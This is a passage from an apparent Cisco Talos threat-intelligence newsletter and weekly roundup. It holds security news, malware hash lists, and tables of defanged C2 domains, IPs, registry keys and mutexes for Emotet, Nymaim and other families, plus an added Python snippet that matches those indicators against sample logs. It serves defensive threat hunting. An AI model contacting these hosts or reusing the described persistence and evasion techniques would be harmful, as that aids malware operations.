Synopsis: In this presentation, Paul will present two threat actors Cisco Talos has been tracking who are manipulating the DNS system. On Jan. 22, 2019, the U.S. DHS published a directive concerning this attack vector. We will present the timeline for these events and their technical details. One of the actors is behind the campaign we named “Sea Turtle.” This actor is more advanced and more aggressive than others we’ve observed in the past. They do not hesitate to directly target registrars and one registry. The talk will break down these two actors and the methodology used to target the victims.

Event: “Everyone's Advanced Now: The evolution of actors on the threat landscape” at Interop Tokyo 2020
Location: Makuhari Messe, Tokyo, Japan
Date: April 13 - 15
Speakers: Nick Biasini
Synopsis: In the past, there were two clear classes of adversary an enterprise would face: sophisticated and basic. These basic threats were commodity infections that would require simple triage and remediation. Today, these commodity infections can quickly turn into enterprise-crippling ransomware attacks, costing organizations millions of dollars to recover. Now more than ever, organizations need every advantage they can get — and threat intelligence is a big part of it. Having visibility into your own environment and attacks around the globe are equally vital to success. This talk will cover these trends and show how the gap between the sophisticated and the basic adversary is quickly disappearing.

Cyber Security Week in Review

  • Problems with an election results-reporting app led to the delay of Democratic presidential primary results in Iowa this week. Election officials in the state say the app, developed by company Shadow Inc., was not hacked, though security experts say they discovered several flaws in the software that left it open to attack. 
  • The Iowa debacle was embarrassing for the Democratic party and the state, since Iowa prides itself on being the first state to host primary elections, setting the stage for the rest of the presidential election. After the mishap, other states are looking into what types of backup plans they need to have in place for their own elections. 
  • Amazon CEO Jeff Bezos may have met with FBI investigators as far back as April 2019 regarding the hacking of his iPhone. The interview reportedly took place as part of the FBI’s investigation into the Israeli technology company NSO Group. 
  • Gamaredon, an APT with pro-Russian ties, is growing its capabilities. New research shows the group has stepped up its operations so far this year, targeting a larger number of victims and focusing even more on disrupting the Ukrainian government. 
  • The EKANS ransomware recently added new capabilities to make it more effective against industrial control systems. However, researchers believe the malware’s capabilities are still somewhat primitive.  
  • Cargo shipments across Australia are on hold after the logistics company Toll was hit with a ransomware attack. The company says it’s seen no evidence to suggest any personal data was lost. 
  • The U.S. government is pushing tech companies and government agencies to develop an alternative to Chinese company Huawei’s 5G service. Huawei’s been locked in a battle with America for years over security concerns. 
  • A vulnerability in Google Photos could have allowed anyone to view and download other users’ private videos. Google Takeout, a service that allows users to download archives of their Google data, mistakenly included the wrong videos in some files.  
  • Google released the latest update for its Chrome web browser this week, fixing 56 vulnerabilities. The new version also forces more content through HTTPS rather than the less secure HTTP. 
  • The NSA’s decision to publicly disclose an urgent bug in Microsoft Internet Explorer could point toward bigger changes for the agency. Traditionally, the NSA has held onto vulnerabilities it discovers that it believes could be used to spy on other state-sponsored actors. 

Notable recent security issues

Title: NetWire RAT reappears with financial motivations
Description: Security researchers recently discovered a new variant of the NetWire remote access trojan being spread via fake business emails. Attackers are sending supposed invoices from legitimate-looking emails that download the RAT. Once infected, NetWire carries out a series of malicious actions that all appear aimed at stealing users’ financial information and logins. NetWire first emerged in 2012, and has since gone through various iterations across multiple adversaries.
Snort SIDs: 53026 – 53030

Title: Cisco small business switches open to denial of service attacks
Description: Cisco disclosed two high-severity vulnerabilities in some of its small business switches. An attacker could exploit these vulnerabilities to carry out denial-of-service attacks or obtain sensitive information. Products in Cisco's Small Business Smart Switches, Managed Switches and Stackable Managed Switches series are affected, and a patch is now available. Cisco said in its vulnerability advisory that it was unaware of active exploitation of any of these vulnerabilities.
Snort SIDs: 52993 - 52998

Most prevalent malware files this week

SHA 256: 3f6e3d8741da950451668c8333a4958330e96245be1d592fcaa485f4ee4eadb3
MD5: 47b97de62ae8b2b927542aa5d7f3c858
Typical Filename: qmreportupload.exe
Claimed Product: qmreportupload
Detection Name: Win.Trojan.Generic::in10.talos

SHA 256: c0cdd2a671195915d9ffb5c9533337db935e0cc2f4d7563864ea75c21ead3f94 
MD5: 7c38a43d2ed9af80932749f6e80fea6f
Typical Filename: xme64-520.exe
Claimed Product: N/A 
Detection Name: PUA.Win.File.Coinminer::1201

SHA 256: 1460fd00cb6addf9806a341fee9c5ab0a793762d1d97dca05fa17467c8705af7 
MD5: 88cbadec77cf90357f46a3629b6737e6
Typical Filename: FlashHelperServices.exe
Claimed Product: Flash Helper Services
Detection Name: PUA.Win.File.2144flashplayer::tpd 

SHA 256: 85b936960fbe5100c170b777e1647ce9f0f01e3ab9742dfc23f37cb0825b30b5
MD5: 8c80dd97c37525927c1e549cb59bcbf3
Typical Filename: eternalblue-2.2.0.exe
Claimed Product: N/A
Detection Name: W32.85B936960F.5A5226262.auto.Talos

SHA 256: c3e530cc005583b47322b6649ddc0dab1b64bcf22b124a492606763c52fb048f
MD5: e2ea315d9a83e7577053f52c974f6a5a
Typical Filename: c3e530cc005583b47322b6649ddc0dab1b64bcf22b124a492606763c52fb048f
Claimed Product: N/A
Detection Name: W32.AgentWDCR:Gen.21gn.1201

Keep up with all things Talos by following us on Twitter. Snort, ClamAV and Immunet also have their own accounts you can follow to keep up with their latest updates. You can also subscribe to the Beers with Talos podcast here (as well as on your favorite podcast app). And, if you’re not already, you can also subscribe to the weekly Threat Source newsletter here.

Threat Roundup for January 31 to February 7

Today, Talos is publishing a glimpse into the most prevalent threats we've observed between Jan. 31 and Feb. 7. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key behavioral characteristics, indicators of compromise, and discussing how our customers are automatically protected from these threats.

As a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Additionally, please keep in mind that IOC searching is only one part of threat hunting. Spotting a single IOC does not necessarily indicate maliciousness. Detection and coverage for the following threats is subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, Snort.org, or ClamAV.net.

For each threat described below, this blog post only lists 25 of the associated file hashes and up to 25 IOCs for each category. An accompanying JSON file can be found here that includes the complete list of file hashes, as well as all other IOCs from this post. As always, please remember that all IOCs contained in this document are indicators, and one single IOC does not indicate maliciousness.
The most prevalent threats highlighted in this roundup are:

Threat Name | Type | Description
Doc.Downloader.Emotet-7572697-1 | Downloader | Emotet is one of the most widely distributed and active malware families today. It is a highly modular threat that can deliver a wide variety of payloads. Emotet is commonly delivered via Microsoft Office documents with macros, sent as attachments on malicious emails.
Win.Malware.Nymaim-7569940-0 | Malware | Nymaim is malware that can be used to deliver ransomware and other malicious payloads. It uses a domain-generation algorithm to generate potential command and control (C2) domains from which to fetch additional payloads.
Win.Dropper.Genkryptik-7572204-0 | Dropper | Genkryptik is often a generic detection name for a Windows trojan. Malicious activities these samples may perform without the user's knowledge include collecting system information, downloading/uploading files and dropping additional samples.
Win.Worm.Gh0stRAT-7571319-1 | Worm | Gh0stRAT is a well-known family of remote access trojans designed to provide an attacker with complete control over an infected system. Capabilities include monitoring keystrokes, collecting video footage from the webcam, and uploading/executing follow-on malware. The source code for Gh0stRAT has been publicly available on the Internet for years, significantly lowering the barrier for actors to modify and reuse the code in new attacks.
Win.Ransomware.Cerber-7571364-0 | Ransomware | Cerber is ransomware that encrypts documents, photos, databases and other important files. Historically, this malware would replace files with encrypted versions and add the file extension ".cerber," although, in more recent campaigns, other file extensions are used.
Win.Malware.Kovter-7571676-0 | Malware | Kovter is known for its fileless persistence mechanism. This family of malware creates several malicious registry entries that store its malicious code. Kovter is capable of reinfecting a system, even if the file system has been cleaned of the infection. Kovter has been used in the past to spread ransomware and click-fraud malware.
Win.Dropper.TrickBot-7577793-0 | Dropper | Trickbot is a banking trojan targeting sensitive information for certain financial institutions. This malware is frequently distributed through malicious spam campaigns. Many of these campaigns rely on downloaders for distribution, such as VB scripts.
Win.Packed.Zusy-7572206-0 | Packed | Zusy, also known as TinyBanker or Tinba, is a trojan that uses man-in-the-middle attacks to steal banking information. When executed, it injects itself into legitimate Windows processes such as "explorer.exe" and "winver.exe." When the user accesses a banking website, it displays a form to trick the user into submitting personal information.
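The IOC tables in the breakdown below print network indicators defanged ("[.]" in place of "."), and the roundup's own caveat is that one matching IOC is a lead, not a verdict. The following Python is an added example, not Talos code: it refangs a handful of indicators copied from the Emotet and Nymaim entries below, matches them against constructed DNS/proxy log lines (not real telemetry), and escalates only hosts that touched more than one distinct indicator. The key=value log format and the two-indicator threshold are assumptions.

```python
import re
from collections import defaultdict
from typing import Dict, Iterable, List, Set

# Indicators copied from the Emotet and Nymaim entries in this roundup,
# still defanged the way the tables print them.
DEFANGED_IOCS = [
    "chonhangchuan[.]net",
    "104[.]236[.]28[.]47",
    "133[.]130[.]97[.]61",
    "vlddqnhkoxei[.]com",
    "elnqzs[.]net",
]


def refang(ioc: str) -> str:
    """Undo the [.] defanging so the value can be compared with live log data."""
    return ioc.replace("[.]", ".")


# Constructed sample log lines (not real telemetry). Assumed format:
# timestamp, source host, and either a DNS query name or a destination IP.
SAMPLE_LOG = """\
2020-02-07T10:01:02Z host=ws01 dns=chonhangchuan.net
2020-02-07T10:01:03Z host=ws01 dst=104.236.28.47
2020-02-07T10:05:00Z host=ws07 dst=133.130.97.61
2020-02-07T10:06:00Z host=ws09 dns=update.example.org
2020-02-07T10:06:30Z host=ws01 dns=chonhangchuan.net
"""

LOG_RE = re.compile(r"host=(\S+)\s+(?:dns|dst)=(\S+)")


def match_iocs(log_text: str, iocs: Iterable[str]) -> Dict[str, Set[str]]:
    """Map each host to the set of distinct refanged indicators it touched."""
    wanted = {refang(i) for i in iocs}
    hits: Dict[str, Set[str]] = defaultdict(set)
    for line in log_text.splitlines():
        m = LOG_RE.search(line)
        if m and m.group(2) in wanted:
            hits[m.group(1)].add(m.group(2))
    return dict(hits)


def hosts_to_escalate(hits: Dict[str, Set[str]], min_distinct: int = 2) -> List[str]:
    """A single IOC hit is a lead to triage; a host that touched two or more
    distinct indicators from the same family is much harder to explain away."""
    return sorted(h for h, s in hits.items() if len(s) >= min_distinct)


if __name__ == "__main__":
    found = match_iocs(SAMPLE_LOG, DEFANGED_IOCS)
    for host, seen in sorted(found.items()):
        print(host, sorted(seen))
    print("escalate:", hosts_to_escalate(found))   # escalate: ['ws01']
```

ws07 contacted one of the listed IP addresses, which the table itself marks as not indicating maliciousness on its own, so it is left for triage; ws01 resolved the Emotet domain and then connected to one of its IPs, and is escalated.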

Threat Breakdown

Doc.Downloader.Emotet-7572697-1

Indicators of Compromise

Registry Keys | Occurrences
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\MEXICOGUID | 24
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\MEXICOGUID (Value Name: Type) | 24
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\MEXICOGUID (Value Name: Start) | 24
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\MEXICOGUID (Value Name: ErrorControl) | 24
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\MEXICOGUID (Value Name: ImagePath) | 24
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\MEXICOGUID (Value Name: DisplayName) | 24
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\MEXICOGUID (Value Name: WOW64) | 24
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\MEXICOGUID (Value Name: ObjectName) | 24

Mutexes | Occurrences
Global\I98B68E3C | 24
Global\M98B68E3C | 24
Global\IC019706B | 1
Global\MC019706B | 1
Global\8032E0D6835932960 | 1

IP Addresses contacted by malware (does not indicate maliciousness) | Occurrences
169[.]254[.]255[.]255 | 1
198[.]58[.]114[.]91 | 1
93[.]189[.]42[.]146 | 1
5[.]2[.]75[.]167 | 1
104[.]236[.]28[.]47 | 25
133[.]130[.]97[.]61 | 25

Domain Names contacted by malware (does not indicate maliciousness) | Occurrences
252[.]5[.]55[.]69[.]spam[.]abuse[.]ch | 1
252[.]5[.]55[.]69[.]spam[.]dnsbl[.]sorbs[.]net | 1
252[.]5[.]55[.]69[.]zen[.]spamhaus[.]org | 1
252[.]5[.]55[.]69[.]b[.]barracudacentral[.]org | 1
chonhangchuan[.]net | 25

Files and/or directories created | Occurrences
%SystemRoot%\SysWOW64\msgchannelb.exe | 1
%SystemRoot%\SysWOW64\msgchannela.exe | 1
%APPDATA%\windirect\settings.ini | 1
%HOMEPATH%\532.exe | 25
%ProgramData%\4Cs14qtyjWERecs90J.exe | 1
%ProgramData%\8MoBR9ygNour.exe | 1

File Hashes

007fc647ae0f8639902f3c6ebae36e993f8b3fc08297118da2feb154df40740f 018ed3d6c7e96cb9010633c08acf5ddce16fccdaae299dfcf7d87e79eda6bd39 07e176a1c503e7a072f8a5f31b0871e961aae07fad606a3c3838b856442487eb 0860e692cd7444b9a85df9d15c46bfd707454cc8c1267d4de56260bf3d6cffa2 0de64e1664365414c3c529bb8dab306b995b61e34cb4d58b0d07ed6d716c715f 0f3358b0b2b1c8e74a38319daad492d7adcf2d130cc8dbd439c684c9c9e5153c 1a8fe6dd6c3cdf567f41bb6977a88c892473797acde8694ced39139640715bcb 1e835f85dc0631028c5bd4aaa75b166b8d9714642876339a4a86ef40973b6ace 220c8e32a0f771b62f01279391d3f93a40d3ce389b45d4ffff0699188792ea23 2cdc0e42a36a681175b5b3eeef29037709e43e7123aabc1f4bcee86fa06a4896 375eea419ae94249961ad625ce1dcd3502860bc1e6e396afb4570c735bf43803 3b89f52ac5385d9f8733f4ec6f3bb7721df689a5dd1c197bfcd3feffb9749dd4 62a2e813d32c179dfe3a565558a48fb0c5b9820b337458028a5232c5de9eaf42 8075bc50d7e867f0a255b9826f5c6bc35a0c82f1408ad3502b499055549c8e1f 85fbf7b289eaa61b99bcbe56e804abf3083cb14448b1ca8a9b20896989f27e9c 8f2d6be36b63d09c277df0cdf4788ed3c057cfaaa7d84e06e2e79ea9998d3dd6 93f972acfdb179a6ecdb35d1ff2602a197aaacb5039572bf5600ebc8186618c2 a892730b092202036e00e25cbdbd3464711db05ffa30c92d99eabeb8be5b6e1e b1ec2a137410f27af98fba5d9da34af0583feead57d2328aa98ecc0cca490081 b4b51782bfcebdf89072029a92244cd4bf53dfebbeb9f125c3bd721b9bc7855a b6160c8601befc7f62c4e3b274430b710c05e596d69d2c34e9710597336b35cb c00797ecdd835144cf9183edd42e45c2e4b117a4d1fafd670f9c2a4f464eba9a c50e5289d3bebdab1ba9b8d101d47596c8cc72e2616df6690189b1e99ce5268f d00f4a6e014ec6f602d2dd0a99fc10084f111ccae25bde16dd4ee05c204ba7c1 d558d946a685c29cfab63009dba1b91c2a870a2e623d028d0a70b96a9cf12d6f
*See JSON for more IOCs

Coverage

Product | Protection
AMP | This has coverage
Cloudlock | N/A
CWS | This has coverage
Email Security | This has coverage
Network Security | This has coverage
Stealthwatch | N/A
Stealthwatch Cloud | N/A
Threat Grid | This has coverage
Umbrella | This has coverage
WSA | This has coverage

Screenshots of Detection: AMP, ThreatGrid, Umbrella


Win.Malware.Nymaim-7569940-0

Indicators of Compromise

Registry Keys | Occurrences
<HKCU>\SOFTWARE\MICROSOFT\GOCFK | 18
<HKCU>\SOFTWARE\MICROSOFT\GOCFK (Value Name: mbijg) | 18

Mutexes | Occurrences
Local\{369514D7-C789-5986-2D19-AB81D1DD3BA1} | 18
Local\{D0BDC0D1-57A4-C2CF-6C93-0085B58FFA2A} | 18
Local\{F04311D2-A565-19AE-AB73-281BA7FE97B5} | 18
Local\{F6F578C7-92FE-B7B1-40CF-049F3710A368} | 18
Local\{306BA354-8414-ABA3-77E9-7A7F347C71F4} | 18
Local\{F58B5142-BC49-9662-B172-EA3D10CAA47A} | 18
Local\{C170B740-57D9-9B0B-7A4E-7D6ABFCDE15D} | 18
Local\{B888AC68-15DA-9362-2153-60CCDE3753D5} | 18
Local\{2DB629D3-9CAA-6933-9C2E-D40B0ACCAC9E} | 18

Domain Names contacted by malware (does not indicate maliciousness) | Occurrences
wfbimtogx[.]pw | 1
icbwujv[.]pw | 1
lcque[.]com | 1
odouzwyaw[.]in | 1
jknqnrpjgdgo[.]in | 1
hgbcdxmjm[.]net | 1
mnhtemsicp[.]in | 1
hcozsjtscf[.]pw | 1
vkerdawjo[.]in | 1
upkbwykuchtb[.]net | 1
adulvwixq[.]in | 1
rnhrlupcs[.]com | 1
ohxozfvoxg[.]com | 1
gphvrtnt[.]in | 1
zvsrc[.]pw | 1
vlddqnhkoxei[.]com | 18
elnqzs[.]net | 18
sxrzdfil[.]net | 18
papuzvj[.]net | 18
ffincb[.]com | 18
gnmhtaguavi[.]com | 18
pvwdgii[.]pw | 18
llrgmivfnqee[.]pw | 18
nknbtl[.]pw | 18
eeiheou[.]in | 18
*See JSON for more IOCs

Files and/or directories created | Occurrences
%TEMP%\fro.dfx | 18
\Documents and Settings\All Users\pxs\pil.ohu | 18
%ProgramData%\ph | 18
%ProgramData%\ph\fktiipx.ftf | 18
%TEMP%\gocf.ksv | 18
%ProgramData%\<random, matching '[a-z0-9]{3,7}'> | 18
%APPDATA%\<random, matching '[a-z0-9]{3,7}'> | 18
%LOCALAPPDATA%\<random, matching '[a-z0-9]{3,7}'> | 18

File Hashes

0b4181b933a8d0d350a9df085ac98a27350d49cd8bdded69b0153d5ec6adda21 1224eeb04e14029eec5a711ea7b973954f272851d6f4b4d02fecd4b40ebbd3e5 134d474322c25989e1aa2b6c807473d8a099b06716afcc1904dcadadd74e14d9 20c0747e95843e9c09806f7ef954cfd35c94e2b67907617a3bc0299e00026198 3e5ad8831233e388f485cd6b99c4d6687f1d6e38623bf48d2270919aa4d9e000 59445c64816f7513250a3b49cf5a513c842098be8f3730b33056705ef5c1d624 80cb190082bd6b3e0ec0657a1fd76ae5a53e434e19363e93f6ae999135f99594 89adc81706b7dd975f63be1f1269f63add24f292f5c0d93c92b4b411eb6a9fbc 93fbb35c72feccabccdf4d903d10be4bf0090141cef91dfb0e34ab021138c4ba 9dae9cc1db48a1f31f54b1430f72b5a275c5b36afe274510ff25464d6f7f85a2 b43e324ed527c2d52660e31595b5f61c2151808d351ed80fc853e1345bbf6b5c b828ad714533bdca9fbfd96e14bc8fdcb30f1687bade3025b6b1ddfcf46fb793 c90c69db988bc69ec5a6e82e0b71f006d3ad1309bb8f722a8361fdf2cd573f66 db35f03ab4fb2eff6dfa485e85433f4a61016fc2e18b17793e8e0b6c8afe5585 e3795c261bb84415e76175eee1b7d07aa335b690952116b84cc297a1bbd83001 e71d8f0a51ecf0d078930da518e6b7e8c4c001d42200e0e6965691e8fe1549ea ec3b170ebe1a9a524091d5c46da9080f07a409fb11c51a841b695951f14062ba f84a9b3bcfadbeca17b80922487f7632df91f8a1a4adfde04924c7b9f9b54cd0

Coverage

Product | Protection
AMP | This has coverage
Cloudlock | N/A
CWS | This has coverage
Email Security | This has coverage
Network Security | This has coverage
Stealthwatch | N/A
Stealthwatch Cloud | N/A
Threat Grid | This has coverage
Umbrella | This has coverage
WSA | This has coverage

Screenshots of Detection: AMP, ThreatGrid

Win.Dropper.Genkryptik-7572204-0

Indicators of Compromise

Registry Keys | Occurrences
<HKLM>\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\AUTHROOT\CERTIFICATES\75E0ABB6138512271C04F85FDDDE38E4B7242EFE (Value Name: Blob) | 10
<HKCU>\SOFTWARE\WINRAR | 2
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE (Value Name: Startup key) | 2
<HKLM>\SAM\SAM\DOMAINS\ACCOUNT\USERS\000003E9 (Value Name: F) | 2
<HKLM>\SAM\SAM\DOMAINS\ACCOUNT\USERS\000001F5 (Value Name: F) | 2
<HKLM>\SAM\SAM\DOMAINS\ACCOUNT\USERS\000003EC (Value Name: F) | 2
<HKCU>\SOFTWARE\WINRAR (Value Name: HWID) | 2
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN (Value Name: IpgKLBFV) | 1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE (Value Name: enchantsf) | 1

Mutexes | Occurrences
3749282D282E1E80C56CAE5A | 1
Global\{fb001475-4304-414b-b3c4-440bd0301e5f} | 1
Global\{26af037d-c127-451a-807e-f8d8fcf61bd9} | 1
Global\{a7ae8b72-b465-4a93-b481-e821d4114233} | 1

IP Addresses contacted by malware (does not indicate maliciousness) | Occurrences
172[.]217[.]11[.]46 | 1
172[.]217[.]10[.]238 | 7
172[.]217[.]7[.]14 | 2
172[.]217[.]164[.]174 | 1
172[.]217[.]7[.]1 | 2
172[.]217[.]10[.]225 | 7
198[.]251[.]81[.]30 | 1
88[.]233[.]219[.]188 | 1
185[.]61[.]154[.]20 | 1
193[.]142[.]59[.]98 | 1
79[.]134[.]225[.]125 | 1
79[.]134[.]225[.]5 | 1

Domain Names contacted by malware (does not indicate maliciousness) | Occurrences
parking[.]namesilo[.]com | 1
labosan[.]hr | 1
doc-14-b8-docs[.]googleusercontent[.]com | 1
doc-0s-14-docs[.]googleusercontent[.]com | 1
doc-0s-5o-docs[.]googleusercontent[.]com | 1
doc-0c-80-docs[.]googleusercontent[.]com | 1
steel500[.]duckdns[.]org | 1
doc-08-bs-docs[.]googleusercontent[.]com | 1
doc-04-2c-docs[.]googleusercontent[.]com | 1
olodofries88[.]ddns[.]net | 1
doc-0c-bo-docs[.]googleusercontent[.]com | 1
doc-08-68-docs[.]googleusercontent[.]com | 1
doc-0o-bo-docs[.]googleusercontent[.]com | 1
www[.]habitactica[.]com | 1
www[.]71kamahistreet[.]com | 1

Files and/or directories created | Occurrences
%APPDATA%\D282E1 | 1
%APPDATA%\D282E1\1E80C5.lck | 1
%APPDATA%\Microsoft\Crypto\RSA\S-1-5-21-2580483871-590521980-3826313501-500\a18ca4003deb042bbee7a40f15e1970b_d19ab989-a35f-4710-83df-7b2db7efe7c5 | 1
%APPDATA%\D19AB989-A35F-4710-83DF-7B2DB7EFE7C5 | 3
%APPDATA%\D19AB989-A35F-4710-83DF-7B2DB7EFE7C5\Logs | 3
%APPDATA%\D19AB989-A35F-4710-83DF-7B2DB7EFE7C5\Logs\Administrator | 3
%APPDATA%\D19AB989-A35F-4710-83DF-7B2DB7EFE7C5\run.dat | 3
%APPDATA%\D19AB989-A35F-4710-83DF-7B2DB7EFE7C5\task.dat | 2
%System32%\Tasks\AGP Manager | 2
%APPDATA%\D19AB989-A35F-4710-83DF-7B2DB7EFE7C5\catalog.dat | 1
%APPDATA%\D19AB989-A35F-4710-83DF-7B2DB7EFE7C5\settings.bin | 1
%APPDATA%\D19AB989-A35F-4710-83DF-7B2DB7EFE7C5\storage.dat | 1
%APPDATA%\D19AB989-A35F-4710-83DF-7B2DB7EFE7C5\settings.bak | 1
%TEMP%\53d8a91c-2dcd-4297-b0e0-e83b641b15e1 | 1
%TEMP%\96d19517-693a-4d9b-b0bb-58fe0e73df6a | 2
%HOMEPATH%\subfolder1 | 2
%APPDATA%\poblyXd | 1
%APPDATA%\poblyXd\OeqyZ.exe | 1
%TEMP%\tmp6C23.tmp | 1
%TEMP%\tmpB4EC.tmp | 1
%HOMEPATH%\subfolder1\filename1.exe | 1
%HOMEPATH%\BENZOXYPHE | 1
%HOMEPATH%\BENZOXYPHE\ARCSINEB.exe | 1
%HOMEPATH%\subfolder1\filename1.bat | 1
%TEMP%\2022119685.bat | 1
*See JSON for more IOCs

File Hashes

0b023aa63679132222f38f83cc5d068b64294f27378657a83d5a1e382a0f5f6a 1e25b0da80f232dd7736f1df2d02c06c5352468c2b28edd38a5325ad726f4318 311e0a1c78adebcb8f4557b7982add59176bf534575f372b15de89b350f043be 56acc6bbd93fa3697f5c18ce956bc9fed48780a62f2de0af0422edc832a59cd7 5a4ae15c7cfc24d8d051199a42438fb860630f20eaf1d860a57b4483a9b2a1e5 62183848f4eb2622fa3c83e80d47993b177654cfd514479af13b35ccda07a9e1 6d878ebe8f57192c2a5a30313d09dcfc0a5535369dbaf3df1853148e260c15b2 a06f1515117373a10440cfc5fabd3a4edaa6bad649aa51512da3c84b732737f2 a49994d715e1420a4aeda5a840281d6a502b9785f4e9c900f1528a862f4f459d ba8781428af0e8996029c8c2a9ed858e67a1433123bf866459f112c6b1a4adb9 ec2b8daf0e06c86331993b6b47402bcfe64d7192860ff1fd9b12bf74c5412df5

Coverage

Product | Protection
AMP | This has coverage
Cloudlock | N/A
CWS | This has coverage
Email Security | This has coverage
Network Security | This has coverage
Stealthwatch | N/A
Stealthwatch Cloud | N/A
Threat Grid | This has coverage
Umbrella | This has coverage
WSA | This has coverage

Screenshots of Detection

AMP


ThreatGrid


Umbrella




Win.Worm.Gh0stRAT-7571319-1

Indicators of Compromise

Registry Keys
Mutexes
IP Addresses contacted by malware. Does not indicate maliciousness
Files and or directories created
*See JSON for more IOCs

File Hashes


Coverage

Product             Protection
AMP                 This has coverage
Cloudlock           N/A
CWS                 This has coverage
Email Security      This has coverage
Network Security    N/A
Stealthwatch        N/A
Stealthwatch Cloud  N/A
Threat Grid         This has coverage
Umbrella            N/A
WSA                 N/A

Screenshots of Detection

AMP


ThreatGrid




Win.Ransomware.Cerber-7571364-0

Indicators of Compromise

Registry Keys
Mutexes
IP Addresses contacted by malware. Does not indicate maliciousness
Domain Names contacted by malware. Does not indicate maliciousness
Files and or directories created
*See JSON for more IOCs

File Hashes

*See JSON for more IOCs

Coverage

Product             Protection
AMP                 This has coverage
Cloudlock           N/A
CWS                 This has coverage
Email Security      This has coverage
Network Security    N/A
Stealthwatch        N/A
Stealthwatch Cloud  N/A
Threat Grid         This has coverage
Umbrella            N/A
WSA                 N/A

Screenshots of Detection

AMP


ThreatGrid




Win.Malware.Kovter-7571676-0

Indicators of Compromise

Registry Keys
Mutexes
IP Addresses contacted by malware. Does not indicate maliciousness
Domain Names contacted by malware. Does not indicate maliciousness
Files and or directories created
*See JSON for more IOCs

File Hashes

*See JSON for more IOCs

Coverage

Product             Protection
AMP                 N/A
Cloudlock           N/A
CWS                 N/A
Email Security      N/A
Network Security    N/A
Stealthwatch        N/A
Stealthwatch Cloud  N/A
Threat Grid         This has coverage
Umbrella            This has coverage
WSA                 This has coverage

Screenshots of Detection

ThreatGrid


Umbrella




Win.Dropper.TrickBot-7577793-0

Indicators of Compromise

Registry Keys
Mutexes
IP Addresses contacted by malware. Does not indicate maliciousness
Domain Names contacted by malware. Does not indicate maliciousness
Files and or directories created
*See JSON for more IOCs

File Hashes

*See JSON for more IOCs

Coverage

Product             Protection
AMP                 This has coverage
Cloudlock           N/A
CWS                 This has coverage
Email Security      This has coverage
Network Security    This has coverage
Stealthwatch        N/A
Stealthwatch Cloud  N/A
Threat Grid         This has coverage
Umbrella            N/A
WSA                 This has coverage

Screenshots of Detection

AMP


ThreatGrid




Win.Packed.Zusy-7572206-0

Indicators of Compromise

Registry Keys
Mutexes
IP Addresses contacted by malware. Does not indicate maliciousness
Domain Names contacted by malware. Does not indicate maliciousness
Files and or directories created
*See JSON for more IOCs

File Hashes


Coverage

Product             Protection
AMP                 This has coverage
Cloudlock           N/A
CWS                 This has coverage
Email Security      This has coverage
Network Security    N/A
Stealthwatch        N/A
Stealthwatch Cloud  N/A
Threat Grid         This has coverage
Umbrella            N/A
WSA                 N/A

Screenshots of Detection

AMP


ThreatGrid




Exploit Prevention

Cisco AMP for Endpoints protects users from a variety of malware functions with exploit prevention. Exploit prevention helps users defend endpoints from memory attacks commonly used by obfuscated malware and exploits. These exploits use certain features to bypass typical anti-virus software, but were blocked by AMP thanks to its advanced scanning capabilities, even protecting against zero-day vulnerabilities.
CVE-2019-0708 detected - (5540)
An attempt to exploit CVE-2019-0708 has been detected. The vulnerability, dubbed BlueKeep, is a heap memory corruption which can be triggered by sending a specially crafted Remote Desktop Protocol (RDP) request. Since this vulnerability can be triggered without authentication and allows remote code execution, it can be used by worms to spread automatically without human interaction.
Process hollowing detected - (252)
Process hollowing is a technique used by some programs to avoid static analysis. In typical usage, a process is started and its obfuscated or encrypted contents are unpacked into memory. The parent then manually sets up the first stages of launching a child process, but before launching it, the memory is cleared and filled in with the memory from the parent instead.
Gamarue malware detected - (177)
Gamarue is a family of malware that can download files and steal information from an infected system. Worm variants of the Gamarue family may spread by infecting USB drives or portable hard disks that have been plugged into a compromised system.
Kovter injection detected - (142)
A process was injected into, most likely by an existing Kovter infection. Kovter is a click-fraud Trojan that can also act as an information stealer. Kovter is also fileless malware, meaning the malicious DLL is stored inside the Windows registry and injected directly into memory using PowerShell. It can detect and report the use of monitoring software such as Wireshark and sandboxes to its C2. It spreads through malicious advertising and spam campaigns.
Installcore adware detected - (103)
InstallCore is an installer which bundles legitimate applications with offers for additional third-party applications that may be unwanted. The unwanted applications are often adware that displays advertising in the form of pop-ups or by injecting into browsers and adding or altering advertisements on web pages. Adware is known to sometimes download and install malware.
Excessively long PowerShell command detected - (100)
A PowerShell command with a very long command line argument that may indicate an obfuscated script has been detected. PowerShell is an extensible Windows scripting language present on all versions of Windows. Malware authors use PowerShell in an attempt to evade security software or other monitoring that is not tuned to detect PowerShell based threats.
Dealply adware detected - (58)
DealPly is adware, which claims to improve your online shopping experience. It is often bundled into other legitimate installers and is difficult to uninstall. It creates pop-up advertisements and injects advertisements on webpages. Adware has also been known to download and install malware.
Corebot malware detected - (15)
Corebot is a Trojan with many capabilities found in other prominent families. It features a plugin system to enable it to load a variety of features from the C&C server at any time. Known plugins include RAT capabilities such as taking desktop screenshots, as well as being able to intercept and modify browser communications and steal data, especially data related to banking.
Trickbot malware detected - (9)
Trickbot is a banking Trojan which appeared in late 2016. Due to the similarities between Trickbot and Dyre, it is suspected that some of the individuals responsible for Dyre are now responsible for Trickbot. Trickbot has been rapidly evolving in the months since it appeared. However, Trickbot is still missing some of the capabilities Dyre possessed. Its current modules include DLL injection, system information gathering, and email searching.
Reverse http payload detected - (6)
An exploit payload intended to connect back to an attacker-controlled host using HTTP has been detected.
